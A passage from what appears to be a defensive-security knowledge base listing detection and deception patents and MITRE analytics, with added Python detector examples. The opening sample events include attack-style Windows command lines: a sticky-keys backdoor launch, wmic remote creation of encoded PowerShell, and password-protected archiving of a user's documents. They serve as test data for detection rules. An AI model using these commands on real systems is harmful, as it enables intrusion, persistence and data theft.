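    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\winlogon.exe",
     "CommandLine": r'cmd.exe "C:\Windows\System32\sethc.exe" 211'},
    {"Image": r"C:\Windows\System32\sethc.exe", "ParentImage": r"C:\Windows\System32\winlogon.exe",
     "CommandLine": r"C:\Windows\System32\sethc.exe 211"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic.exe /node:"FILESRV01" process call create "powershell -enc SQBFAFgA"'},
    {"Image": r"C:\Program Files\WinRAR\Rar.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"Rar.exe a -hpSecret C:\Users\Public\out.rar C:\Users\bob\Documents"},
    {"Image": r"C:\Users\Public\svc.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"svc.exe a -m5 C:\Users\Public\o.7z C:\Users\bob\Documents"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File a.ps1"},
]


def _base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return os.path.basename(path.replace("\\", "/")).lower()


def split_cmdline(cmdline):
    """Split a Windows command line into tokens, treating double-quoted spans as one token."""
    tokens, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def rule_winlogon_shell(ev):
    """CAR-2014-11-008: cmd.exe or powershell.exe whose parent is winlogon.exe."""
    return _base(ev["Image"]) in SHELLS and _base(ev["ParentImage"]) == "winlogon.exe"


def rule_accessibility_debugger(ev):
    """CAR-2014-11-003: an accessibility program named in the arguments of another
    executable, the shape of an Image File Execution Options Debugger launch."""
    if _base(ev["Image"]) in ACCESSIBILITY_PROGRAMS:
        return False
    args = split_cmdline(ev["CommandLine"])[1:]
    return any(_base(a) in ACCESSIBILITY_PROGRAMS for a in args)


def rule_wmic_remote_process(ev):
    """CAR-2016-03-002: wmic.exe /node:<host or IP> process call create <command>."""
    return _base(ev["Image"]) == "wmic.exe" and WMIC_REMOTE_CREATE.search(ev["CommandLine"]) is not None


def rule_archive_add(ev):
    """CAR-2013-07-005: first argument is the archiver 'a' (add) command, independent of
    the program name, so a renamed rar.exe or 7z.exe still matches."""
    args = split_cmdline(ev["CommandLine"])[1:]
    return len(args) >= 2 and args[0].lower() == "a"


RULES = [("CAR-2014-11-008", rule_winlogon_shell),
         ("CAR-2014-11-003", rule_accessibility_debugger),
         ("CAR-2016-03-002", rule_wmic_remote_process),
         ("CAR-2013-07-005", rule_archive_add)]


def detect(events):
    """(event index, analytic id) for every rule that fires, in event then rule order."""
    return [(i, name) for i, ev in enumerate(events) for name, fn in RULES if fn(ev)]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The first sample event trips both logon-screen analytics at once, which is the "in tandem" pairing CAR-2014-11-008 asks for; the second, sethc.exe itself started by winlogon.exe, is the legitimate case and fires neither.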

Usage (5)

kb-abstract

  • "Deception-based techniques for responding to security attacks are described herein. The techniques include transitioning a security attack to a monitored computing device posing as a computing device impacted by the security attack and enabling the adversary to obtain deceptive information from the monitored computing device. Also, the adversary may obtain a document configured to report identifying information of an entity opening the document, thereby identifying the adversary associated with the attack. Further, the techniques include determining that a domain specified in a domain name request is associated with malicious activity and responding to the request with a network address of a monitored computing device to cause the requesting process to communicate with the monitored computing device in place of an adversary server. Additionally, a service may monitor dormant domains names associated with malicious activity and, in response to a change, respond with an alert or a configuration update."

kb-author

  • "Adam S. Meyers; Dmitri Alperovitch; George Robert Kurtz; David F. Diehl; Sven Krasser"

kb-mitre-analysis

  • ""

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Deception-Based Responses to Security Attacks - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Deception-Based Responses to Security Attacks"

Usage (5)

kb-abstract

  • "A computer implemented method of detecting unauthorized access to a protected network by monitoring a dynamically updated deception environment, comprising launching, on one or more decoy endpoints, one or more decoy operating system (OS) managing one or more of a plurality of deception applications mapping a plurality of applications executed in a protected network, updating dynamically a usage indication for a plurality of deception data objects deployed in the protected network to emulate usage of the plurality of deception data objects for accessing the deception application(s) wherein the plurality of deception data objects are configured to trigger an interaction with the deception application(s) when used, detecting usage of data contained in the deception data object(s) by monitoring the interaction and identifying one or more potential unauthorized operations based on analysis of the detection."

kb-author

  • "Dean Sysman; Gadi Evron; Imri Goldberg; Itamar Sher; Shmuel Ur"

kb-mitre-analysis

  • ""

kb-organization

  • "Cymmetria Inc"

rdfs:label

  • "Reference - Decoy and deceptive data object technology - Cymmetria Inc"

kb-reference-of

kb-reference-title

  • "Decoy and deceptive data object technology"

Usage (5)

kb-abstract

  • "What if online scammers weren't sure whether the user account they are targeting is really yours, or whether the information they compiled about you is real? It's worth considering whether decoy online personas might help in the quest to safeguard our digital identities and data.

    I believe deception tactics, such as selective and careful use of honeypots, holds promise for defending enterprise IT resources. Some forms of deception could also protect individuals against online scammers and other attackers. This approach might not be quite practical today for most people, but in the future we might find it both necessary and achievable.

    Human attackers and malicious software pursue user accounts and data on-line through harvesting, phishing, password-guessing, software vulnerabilities, and various other means. How might we use decoys to confuse, misdirect, slow down and detect adversaries engaged in such activities?

    ...

    The wealth of personal details available on social networking sites allows attackers to target individuals using social engineering, secret question-guessing and other techniques. For some examples of such approaches, see The Use of Fake or Fraudulent LinkedIn Profiles and Data Mining Resumes for Computer Attack Reconnaissance.

    Setting up one or more fake social network profiles (e.g., on Facebook) that use the person's real name can help the individual deflect the attack or can act as an early warning of an impending attack. A decoy profile could purposefully expose some inaccurate information, while the person's real profile would be more carefully concealed using the site's privacy settings. Decoy profiles would be associated with spamtrap email addresses.

    Similarly, the person could expose decoy profiles on other sites, for instance those that reveal shopping habits (e.g., Amazon), musings (e.g., Twitter), skills (e.g., GitHub), travel (e.g., TripIt), affections (e.g., Pinterest), music taste (e.g., Pandora) and so on. The person's decoy identities could also have fake resumes available on sites such as Indeed and Monster.com."

kb-author

  • "Lenny Zeltser"

kb-mitre-analysis

  • ""

kb-organization

  • "SANS"

rdfs:label

  • "Reference - Decoy Personas for Safeguarding Online Identity Using Deception - MITRE"

kb-reference-of

kb-reference-title

  • "Decoy Personas for Safeguarding Online Identity Using Deception"

Usage (5)

kb-abstract

  • "A DDoS (Distributed Denial-of-Service) attack is very common and easy to execute and does not require any sophisticated tools. It can happen to anyone. In this project we deploy snort in our home network as a NIDS (Network Intrusion Detection System) to detect a DDoS attack and prevent it."

kb-author

  • "Manas Gogoi, Sourav Mishra"

kb-organization

  • "Indian Institute of Information Technology Allahabad"

rdfs:label

  • "Reference - Detecting DDoS Attack Using Snort"

kb-reference-of

kb-reference-title

  • "DETECTING DDoS ATTACK USING Snort"

Usage (5)

kb-abstract

  • "A method and system for detecting network reconnaissance is disclosed wherein network traffic can be parsed into unidirectional flows that correspond to sessions. A learning module may categorize computing entities inside the network into assets and generate asset data to monitor the computing entities. If one or more computing entities address a flow to an address of a host that no longer exists, ghost asset data may be recorded and updated in the asset data. When a computing entity inside the network contacts an object in the dark-net, the computing entity may be recorded as a potential mapper. When the computing entity tries to contact a number of objects in the dark-net, such that a computed threshold is exceeded, the computing entity is identified as a malicious entity performing network reconnaissance."

kb-author

  • "Nicolas BEAUCHESNE; Sungwook Yoon"

kb-mitre-analysis

  • "This patent describes detecting an attacker performing internal reconnaissance within an organization's network to gather intelligence about the configuration of the network or identify the next target. Network packets are collected (ex. tapped from a network switch) and processed to create flows that are used to map out the network to identify network assets as well as ghost assets (addresses not assigned to a device or an existing device that is temporarily disabled). Once this mapping is complete it is used to monitor the network to determine if an attacker is attempting to connect to a ghost asset. If an attacker attempts to connect to a ghost asset over a threshold (ex. contacting four ghost assets in less than seven minutes), an alert is generated."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - Detecting network reconnaissance by tracking intranet dark-net communications - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "Detecting network reconnaissance by tracking intranet dark-net communications"
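An added example, not Vectra's implementation, of the counting step the analysis describes: flows from an internal source to addresses inside the monitored range that no known asset answers for are dark-net contacts, and a source that reaches the threshold number of distinct dark-net addresses inside the time window is flagged as a mapper. The asset table, the /24 range and the flows are all constructed; the threshold and window default to the analysis's worked figure of four ghost assets in under seven minutes. A host that used to exist and was later retired shows up here the same way as a never-assigned address, simply by being absent from the asset table.

```python
import ipaddress
from collections import defaultdict, deque

MONITORED = ipaddress.ip_network("10.0.0.0/24")
# Constructed asset table: addresses the learning module has observed as live hosts.
# Everything else inside MONITORED is treated as dark-net (unassigned or ghost).
KNOWN_ASSETS = {"10.0.0.1", "10.0.0.10", "10.0.0.11", "10.0.0.20", "10.0.0.30", "10.0.0.50"}

# Constructed unidirectional flows as (timestamp in seconds, source, destination).
SAMPLE_FLOWS = [
    (0, "10.0.0.20", "10.0.0.10"),     # normal traffic to a live asset
    (0, "10.0.0.20", "8.8.8.8"),       # outside the monitored range, ignored
    (0, "10.0.0.20", "10.0.0.99"),     # one stale address, hit twice
    (30, "10.0.0.20", "10.0.0.99"),
    (0, "10.0.0.50", "10.0.0.200"),    # four distinct ghosts in three minutes
    (60, "10.0.0.50", "10.0.0.201"),
    (120, "10.0.0.50", "10.0.0.202"),
    (180, "10.0.0.50", "10.0.0.203"),
    (0, "10.0.0.30", "10.0.0.210"),    # four distinct ghosts, but spread over 20 minutes
    (400, "10.0.0.30", "10.0.0.211"),
    (800, "10.0.0.30", "10.0.0.212"),
    (1200, "10.0.0.30", "10.0.0.213"),
]


def is_dark_net(dst):
    """True when dst lies in the monitored range but no known asset owns it."""
    return ipaddress.ip_address(dst) in MONITORED and dst not in KNOWN_ASSETS


def detect_mappers(flows, threshold=4, window=420):
    """Return {source: timestamp of first trigger} for sources that contact at least
    `threshold` distinct dark-net addresses within any `window` seconds."""
    recent = defaultdict(deque)      # source -> (timestamp, destination), oldest first
    flagged = {}
    for ts, src, dst in sorted(flows):
        if not is_dark_net(dst) or src in flagged:
            continue
        q = recent[src]
        q.append((ts, dst))
        while q and q[0][0] < ts - window:
            q.popleft()              # drop contacts that fell out of the window
        if len({d for _, d in q}) >= threshold:
            flagged[src] = ts        # distinct addresses, so retries of one ghost don't count
    return flagged


if __name__ == "__main__":
    print(detect_mappers(SAMPLE_FLOWS))   # {'10.0.0.50': 180}
```

Counting distinct destinations rather than raw flows is what keeps 10.0.0.20, which retries a single stale address, below the threshold, and the sliding window is what separates 10.0.0.50's sweep from 10.0.0.30's slow drift; widening the window to cover 20 minutes flags both.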

Usage (5)

kb-abstract

  • "Described herein are systems, techniques, and computer program products for preventing execution, by a scripting engine, of harmful commands that may be introduced by computer malware or other mechanisms. The system identifies certain host processes that may attempt to utilize a hosted scripting engine. An unmanaged interface module is injected into an identified host process. The unmanaged interface module is configured to detect certain conditions indicating the likelihood that a scripting engine will be instantiated, and in response to inject a managed interface module into the host process. The managed interface module hooks into certain methods of the scripting engine to intercept commands before they are executed by the scripting engine. The managed and unmanaged interface components then communicate with a kernel-mode threat detection component to determine whether any commands should be blocked."

kb-author

  • "Ion-Alexandru IONESCU; Satoshi Tanda"

kb-mitre-analysis

  • "The patent describes techniques that can be implemented to detect and block malicious commands and command scripts from being executed by scripting engines.

    ### Script Execution Monitoring explanation
    This patent describes software installed on the host system that hooks into methods of a scripting engine to intercept commands before they are executed and block commands if they are determined to be harmful. For example regular expression checking may be used to identify commands having malicious patterns. Expression checking may be used for script files as well as interactively typed commands.

    ### File Content Signatures explanation
    This patent includes File Content Signatures because in the case of a script file, a hash of the file is compared against hashes of known malicious script files to determine whether the script file is malicious."

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Detecting script-based malware - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Detecting script-based malware"

Usage (5)

kb-abstract

  • "In one aspect, a method useful for preventing exploitation of a vulnerability in an interpreted code by monitoring and validating an execution of the interpreted code in a script file by an application server, includes the step of generating a mapping for an incoming network connection to a specified script file to be executed by an application server. The computerized method includes the step of inserting a hook for monitoring an application programming interface (API) call or a privileged instruction executed by the application server. The computerized method includes the step of inserting a validation code configured to validate the API call or the privileged instruction executed by the interpreted code in a script."

kb-author

  • "Jayant Shukla"

kb-mitre-analysis

  • "This patent describes a technique for monitoring API calls. During execution of interpreted code the observed API calls are validated against a whitelist of API calls for that interpreted code file. Action is taken if the observed API call is not in accordance with the list."

kb-organization

  • "K2 Cyber Security Inc"

rdfs:label

  • "Reference - Deterministic method for detecting and blocking of exploits on interpreted code - K2 Cyber Security Inc"

kb-reference-of

kb-reference-title

  • "Deterministic method for detecting and blocking of exploits on interpreted code"
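
The mapping, hook and validation steps of the abstract above, as an added Python example rather than K2's implementation. The route table, the per-script API allowlist and the stand-in privileged APIs are constructed; the decorator plays the part of the inserted hook, and a context variable carries the connection-to-script mapping into the validation code.

```python
import functools
from contextvars import ContextVar

# Constructed route table: which script file the application server runs for a path.
ROUTE_TO_SCRIPT = {"/search": "search.php", "/upload": "upload.php"}

# Constructed allowlist of the API calls each script is expected to make (in practice
# generated by profiling the application ahead of time).
API_ALLOWLIST = {
    "search.php": {"db.query", "json.encode"},
    "upload.php": {"file.write", "json.encode"},
}

# The script currently executing for this connection; set by the mapping step.
current_script = ContextVar("current_script", default=None)


class UnauthorizedApiCall(Exception):
    pass


def map_connection(path: str):
    """Mapping step: bind the incoming connection to the script it will execute."""
    script = ROUTE_TO_SCRIPT.get(path)
    current_script.set(script)
    return script


def validate(api_name: str):
    """Validation code run by the hook: the call must appear in the active script's list."""
    script = current_script.get()
    if api_name not in API_ALLOWLIST.get(script, set()):
        raise UnauthorizedApiCall(f"{script!r} is not permitted to call {api_name}")


def hooked(api_name: str):
    """Decorator standing in for the inserted hook on a privileged API."""
    def wrap(fn):
        @functools.wraps(fn)
        def inner(*args, **kwargs):
            validate(api_name)
            return fn(*args, **kwargs)
        return inner
    return wrap


# Stand-ins for the server's privileged APIs (constructed).
@hooked("db.query")
def db_query(sql):
    return f"rows for {sql}"


@hooked("os.exec")
def os_exec(cmd):
    return f"executed {cmd}"


@hooked("file.write")
def file_write(path, data):
    return len(data)


def handle_request(path, script_body):
    """Simulated request: map the connection, then run the script's logic under the hook."""
    map_connection(path)
    try:
        return ("ok", script_body())
    except UnauthorizedApiCall as err:
        return ("blocked", str(err))
```

A command-injection path that reaches os_exec from search.php is refused even though os_exec itself is a legitimate API, because the decision is keyed on which script is executing, not on the call alone.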

Usage (5)

kb-abstract

  • "A security system provides a defense from known and unknown viruses, worms, spyware, hackers, and social engineering attacks. The system can implement centralized policies that allow an administrator to approve, block, quarantine, and log file activities. A server associated with a number of hosts can provide a query for host computers to access security-related meta-information in local host stores. The query is pulled from the server by the hosts. The results of the distributed host query are stored and merged on the server, and exported for display, reports, or security response."

kb-author

  • "Todd Brennan; John Hanratty"

kb-mitre-analysis

  • "Provides a mechanism to detect, monitor, locate, and control files installed on host computers. Each host has a host agent that analyzes file system activity and takes action based on policies configured on a server. The policies identify whether to block, log, allow, or quarantine actions such as file accesses and execution of executables. Examples of policies include:

    * Block/log execution of new executables and detached scripts (e.g., .exe or .bat)
    * Block/log reading/execution of new embedded content (e.g., macros in .doc)
    * Block/log installation/modification of Web content (alteration of content in .html or .cgi files)
    * Block/log execution of new files in an administratively defined 'class'; e.g., an administrator might want to block screen savers .scr, but not the entire class of executables .exe, .dll, .sys, etc."

kb-organization

  • "Bit 9 Inc"

rdfs:label

  • "Reference - Distributed meta-information query in a network - Bit 9 Inc"

kb-reference-of

kb-reference-title

  • "Distributed meta-information query in a network"

Usage (5)

kb-abstract

  • "Systems and methods of identifying a security risk by monitoring and generating alerts based on attempts to access web domains that have been registered within a short period of time and are therefore identified as "high-risk," including identifying an attempt to access a domain; receiving a registration date of the domain; and detecting a security risk based on the registration date of the domain."

kb-author

  • "Samuel Adams; H D. Moore"

kb-mitre-analysis

  • ""

kb-organization

  • "Rapid7 Inc."

rdfs:label

  • "Reference - Domain age registration alert - Rapid7 Inc."

kb-reference-of

kb-reference-title

  • "Domain age registration alert"

Usage (5)

kb-abstract

  • "Techniques for dynamic selection and generation of detonation location of suspicious content with a honey network are disclosed. In some embodiments, a system for dynamic selection and generation of detonation location of suspicious content with a honey network includes a virtual machine (VM) instance manager that manages a plurality of virtual clones executed in an instrumented VM environment, in which the plurality of virtual clones executed in the instrumented VM environment correspond to the honey network that emulates a plurality of devices in an enterprise network; and an intelligent malware detonator that detonates a malware sample in at least one of the plurality of virtual clones executed in the instrumented VM environment."

kb-author

  • "Taylor Ettema; Huagang Xie"

kb-mitre-analysis

  • ""

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - Dynamic selection and generation of a virtual clone for detonation of suspicious content within a honey network - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "Dynamic selection and generation of a virtual clone for detonation of suspicious content within a honey network"

Usage (5)

kb-abstract

  • "In this paper, we describe characteristics of the most widely used defense techniques for the blocking of user-initiated malware and why these techniques are insufficient. We then introduce a module verification strategy that will eliminate, or at least severely reduce, this problem by extending the classic "defense in depth" network security strategy. We then describe how the augmentation of a standard operating system loader to include references to a database of cryptographic hashes of module executables can be used to implement this strategy. Finally, we describe our efforts towards the creation of a prototype system that implements the module verification strategy."

kb-author

  • "John V. Harrison"

kb-mitre-analysis

  • "This paper describes application whitelisting. New software executable code is compared to a database of allowed software to determine if the new executable code should be loaded and executed. A database of cryptographic hashes is first created for all allowed software executables. Prior to loading any new executable code, a hash is computed and compared against the hash database. If the hash for the new code does not appear in the database, the executable is not loaded and executed."

kb-organization

  • ""

rdfs:label

  • "Reference - Enhancing Network Security By Preventing User-Initiated Malware Execution - MITRE"

kb-reference-of

kb-reference-title

  • "Enhancing Network Security By Preventing User-Initiated Malware Execution"
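
A hash-database gate in the loader (the Harrison paper above) combined with the class-based block/log/quarantine policies of the Bit 9 entry earlier on this page, as an added Python example. Neither project's code is used; the approved image, the policy table and the default actions are constructed, and the table reproduces the page's own example of blocking new .scr files while only logging other new executables.

```python
import hashlib
import os.path


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed allow-database: digests of every module image approved to load.
# A fake image stands in for a real executable so the check runs offline.
APPROVED_IMAGE = b"MZ\x90\x00approved-module-image"
ALLOWED_HASHES = {sha256(APPROVED_IMAGE)}

# Constructed policy table keyed by administratively defined file class. "new" is the
# action for executing a file whose hash is not in the database; the other keys are
# actions for the corresponding activity on files of that class.
POLICY = {
    "screensaver": {"exts": {".scr"}, "new": "block"},
    "executable":  {"exts": {".exe", ".bat", ".dll", ".sys"}, "new": "log"},
    "web_content": {"exts": {".html", ".cgi"}, "modify": "log"},
    "document":    {"exts": {".doc"}, "embedded": "quarantine"},
}
CLASS_ORDER = ["screensaver", "executable", "web_content", "document"]
DEFAULT_ACTIONS = {"execute": "log", "modify": "allow", "embedded": "allow"}


def classify(path: str) -> str:
    """Map a path to its policy class by extension; unknown extensions are 'other'."""
    ext = os.path.splitext(path)[1].lower()
    for cls in CLASS_ORDER:
        if ext in POLICY[cls]["exts"]:
            return cls
    return "other"


def decide(event: str, path: str, image: bytes = b""):
    """Policy decision for one file event. Returns (action, class, digest-or-None).

    For an execute event the loader-side hash check runs first: a digest present in
    the database is always allowed; otherwise the class policy for new files applies.
    """
    cls = classify(path)
    rules = POLICY.get(cls, {})
    if event == "execute":
        digest = sha256(image)
        if digest in ALLOWED_HASHES:
            return ("allow", cls, digest)
        return (rules.get("new", DEFAULT_ACTIONS["execute"]), cls, digest)
    return (rules.get(event, DEFAULT_ACTIONS.get(event, "allow")), cls, None)
```

The hash check is independent of the file name, so a renamed copy of an approved module still loads and an unknown binary named like a known one still hits the class policy.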

Usage (5)

kb-abstract

  • "In order to gain persistence, privilege escalation, or remote execution, an adversary may use the Windows built-in command AT (at.exe) to schedule a command to be run at a specified time, date, and even host. This method has been used by adversaries and administrators alike. Its use may lead to detection of compromised hosts and compromised users if it is used to move laterally. The built-in Windows tool schtasks.exe (CAR-2013-08-001) offers greater flexibility when creating, modifying, and enumerating tasks. For these reasons, schtasks.exe is more commonly used by administrators, tools/scripts, and power users."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-05-004: Execution with AT - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-05-004: Execution with AT"

Usage (5)

kb-abstract

  • "The Windows built-in tool schtasks.exe provides the creation, modification, and running of scheduled tasks on a local or remote computer. It is provided as a more flexible alternative to at.exe, described in CAR-2013-05-004. Although used by adversaries, the tool is also legitimately used by administrators, scripts, and software configurations. The scheduled tasks tool can be used to gain Persistence and can be used in combination with a Lateral Movement technique to remotely gain execution. Additionally, the command has parameters to specify the user and password responsible for creating the task, as well as the user and password combination that the task will run as. The /s flag will cause a task to run as the SYSTEM user, usually indicating privilege escalation."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-08-001: Execution with schtasks - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-08-001: Execution with schtasks"

Usage (5)

kb-abstract

  • "delivered to DARPA in ~1993"

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - FWTK - Firewall Toolkit"

kb-reference-title

  • "FWTK - Firewall Toolkit"

Usage (5)

kb-abstract

  • "A security agent implemented on a computing device is described herein. The security agent is configured to detect file-modifying malware by detecting that a process is traversing a directory of the memory of the computing device and detecting that the process is accessing files in the memory according to specified file access patterns. The security agent can also be configured to correlate actions of multiple processes that correspond to a specified file access pattern and detect that one or more of the multiple processes are malware by correlating their behavior."

kb-author

  • "Daniel W. Brown"

kb-mitre-analysis

  • "This patent describes a technique for detecting file modifying malware such as wipers and ransomware that overwrite portions of files and encrypt portions of a computer's memory, respectively. Processes that are traversing a directory are identified along with file access patterns. Processes executing on a computing device that are traversing a directory include:

    * changing a directory of a process (e.g., iteratively, systematically, repeatedly)
    * detecting that a process is conducting an "open directory" operation repeatedly
    * the same process traversing through a directory and recording the locations of data files encountered in each sub-directory

    In addition to identifying processes traversing a directory, particular file access patterns are also detected that may be indicative of malicious behavior including:
    * multiple file types being accessed
    * accessing a large number of files
    * files located in multiple locations in the directory being accessed

    If a process is conducting a traversal of the directory and accessing files according to a defined access pattern associated with malicious behavior, a preventative action is performed."

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - File-modifying malware detection - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "File-modifying malware detection"
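
The directory-traversal and file-access-pattern checks above, plus the correlation across several processes that the abstract mentions, run over a constructed file-system event log as an added Python example. It is not CrowdStrike's agent; the thresholds, the parent-pid grouping used for correlation, and the event log are assumptions made for illustration.

```python
import os.path
from collections import defaultdict

# Constructed thresholds: a process (or group) must reach all of them to be flagged.
THRESHOLDS = {"dirs_opened": 3, "files": 8, "types": 3, "file_dirs": 3}


def new_stats():
    return {key: set() for key in THRESHOLDS}


def profile(events, key_fn):
    """Aggregate directory-open and file-access activity per key (pid or parent pid)."""
    stats = defaultdict(new_stats)
    for pid, ppid, op, path in events:
        s = stats[key_fn(pid, ppid)]
        if op == "opendir":
            s["dirs_opened"].add(path)
        elif op in ("read", "write"):
            s["files"].add(path)
            s["types"].add(os.path.splitext(path)[1].lower())
            s["file_dirs"].add(os.path.dirname(path))
    return stats


def matches_pattern(s) -> bool:
    """Traversal plus the access pattern: many files, of several types, in several places."""
    return all(len(s[key]) >= minimum for key, minimum in THRESHOLDS.items())


def detect(events):
    """Return alerts for single processes and for groups of sibling processes whose
    combined activity matches the pattern although no member does on its own."""
    alerts = []
    per_process = profile(events, lambda pid, ppid: pid)
    flagged = {pid for pid, s in per_process.items() if matches_pattern(s)}
    alerts += [("process", pid) for pid in flagged]
    # Correlation step: group by parent pid (a simplification; the patent does not
    # pin its multi-process correlation to a particular key).
    members = defaultdict(set)
    for pid, ppid, _, _ in events:
        members[ppid].add(pid)
    per_group = profile(events, lambda pid, ppid: ppid)
    for ppid, s in per_group.items():
        if matches_pattern(s) and not (members[ppid] & flagged):
            alerts.append(("process-group", ppid))
    return sorted(alerts)


# Constructed event log: (pid, ppid, operation, path)
SAMPLE_EVENTS = [
    # pid 4242: walks the user's tree and rewrites everything it finds
    (4242, 1, "opendir", "/home/u/Documents"),
    (4242, 1, "write", "/home/u/Documents/a.docx"),
    (4242, 1, "write", "/home/u/Documents/b.xlsx"),
    (4242, 1, "write", "/home/u/Documents/c.pdf"),
    (4242, 1, "opendir", "/home/u/Documents/Work"),
    (4242, 1, "write", "/home/u/Documents/Work/d.docx"),
    (4242, 1, "write", "/home/u/Documents/Work/e.xlsx"),
    (4242, 1, "write", "/home/u/Documents/Work/f.pdf"),
    (4242, 1, "opendir", "/home/u/Pictures"),
    (4242, 1, "write", "/home/u/Pictures/g.jpg"),
    (4242, 1, "write", "/home/u/Pictures/h.jpg"),
    # pid 1010: an editor touching one document
    (1010, 1, "opendir", "/home/u/Documents"),
    (1010, 1, "read", "/home/u/Documents/a.docx"),
    (1010, 1, "write", "/home/u/Documents/a.docx"),
    # pids 5001-5003: three workers of parent 5000, each below threshold alone
    (5001, 5000, "opendir", "/srv/share/finance"),
    (5001, 5000, "write", "/srv/share/finance/q1.xlsx"),
    (5001, 5000, "write", "/srv/share/finance/q2.xlsx"),
    (5001, 5000, "write", "/srv/share/finance/q3.xlsx"),
    (5002, 5000, "opendir", "/srv/share/hr"),
    (5002, 5000, "write", "/srv/share/hr/p1.docx"),
    (5002, 5000, "write", "/srv/share/hr/p2.docx"),
    (5002, 5000, "write", "/srv/share/hr/p3.docx"),
    (5003, 5000, "opendir", "/srv/share/legal"),
    (5003, 5000, "write", "/srv/share/legal/c1.pdf"),
    (5003, 5000, "write", "/srv/share/legal/c2.pdf"),
    (5003, 5000, "write", "/srv/share/legal/c3.pdf"),
]
```

The group alert is only raised when no member was already flagged, so a single noisy process does not double-count through its parent; the three workers under pid 5000 are caught only because their activity is combined.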

Usage (5)

kb-author

  • "Geoffrey John Hulten, Paul Stephen Rehfuss, Robert Rounthwaite, Joshua Theodore Goodman, Gopalakrishnan Seshadrinathan, Anthony P. Penta, Manav Mishra, Roderic C. Deyo, Elliott Jeb Haber, David Aaron Ward Snelling"

rdfs:label

  • "Reference - Finding phishing sites"

kb-reference-of

kb-reference-title

  • "Finding phishing sites"

Usage (5)

kb-abstract

  • "Regulating the flow of internetwork connections through a firewall (10) having a network protocol stack (14,16,18) which includes an Internet Protocol (IP) layer (16). A determination is made of the parameters characteristic of a connection request, including a netelement parameter characteristic of where the connection request came from. A query is generated and a determination is made whether there is a rule corresponding to that query. If there is a rule corresponding to the query, a determination is made whether authentication is required by the rule. If authentication is required by the rule, an authentication protocol is activated and the connection is activated if the authentication protocol is completed successfully."

kb-author

  • "Edward B Stockwell, Alan E Klietz"

kb-mitre-analysis

  • ""

kb-organization

  • "Secure Computing LLC"

rdfs:label

  • "Reference - Firewall for internet access - Secure Computing LLC"

kb-reference-of

kb-reference-title

  • "Firewall for internet access"

Usage (5)

kb-abstract

  • "The present invention is a device for and method of accessing a network by initializing a database, an approved list, and a disapproved list; receiving a connectionless network packet; computing a flow tag based on the connectionless network packet; discarding the connectionless network packet and returning to the second step if the flow tag is on the disapproved list; allowing access to the network and returning to the second step if the flow tag is on the approved list; comparing the flow tag to the database if the flow tag is not on the approved list or the disapproved list; discarding the connectionless network packet, adding the flow tag to the disapproved list, and returning to the second step if the database rejects the flow tag; and allowing access to the network, adding the flow tag to the approved list, and returning to the second step if the database accepts the flow tag."

kb-author

  • "Patrick W. Dowd, John T. McHenry"

kb-mitre-analysis

  • ""

kb-organization

  • "National Security Agency"

rdfs:label

  • "Reference - Firewall for processing a connectionless network packet - National Security Agency"

kb-reference-of

kb-reference-title

  • "Firewall for processing a connectionless network packet"
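
The approved-list/disapproved-list/database loop of the abstract above as an added Python example, not the NSA's implementation. The flow tag is computed from the 5-tuple (the abstract does not say which fields go into it), and the rule database and packets are constructed.

```python
import hashlib
import ipaddress


def flow_tag(pkt) -> str:
    """Tag derived from the packet's 5-tuple (an assumption; the patent does not fix
    the exact fields)."""
    key = f"{pkt['src']}|{pkt['dst']}|{pkt['proto']}|{pkt['sport']}|{pkt['dport']}"
    return hashlib.sha256(key.encode()).hexdigest()[:16]


class FlowTagFirewall:
    def __init__(self, rules):
        self.rules = rules            # the rule database: (predicate, accept) in order
        self.approved = set()         # flow tags the database accepted
        self.disapproved = set()      # flow tags the database rejected
        self.db_lookups = 0

    def consult_database(self, pkt) -> bool:
        self.db_lookups += 1
        for predicate, accept in self.rules:
            if predicate(pkt):
                return accept
        return False                  # no matching rule: reject

    def process(self, pkt):
        """One pass of the patent's loop for a single connectionless packet."""
        tag = flow_tag(pkt)
        if tag in self.disapproved:
            return ("discard", "disapproved-list", tag)
        if tag in self.approved:
            return ("allow", "approved-list", tag)
        if self.consult_database(pkt):
            self.approved.add(tag)
            return ("allow", "database", tag)
        self.disapproved.add(tag)
        return ("discard", "database", tag)


# Constructed rule database for a small internal network.
INTERNAL = ipaddress.ip_network("10.0.0.0/24")
RESOLVER = ipaddress.ip_address("10.0.0.53")
RULES = [
    (lambda p: p["proto"] == "udp" and p["dport"] == 53
               and ipaddress.ip_address(p["src"]) in INTERNAL
               and ipaddress.ip_address(p["dst"]) == RESOLVER, True),
    (lambda p: p["proto"] == "udp" and p["dport"] == 123
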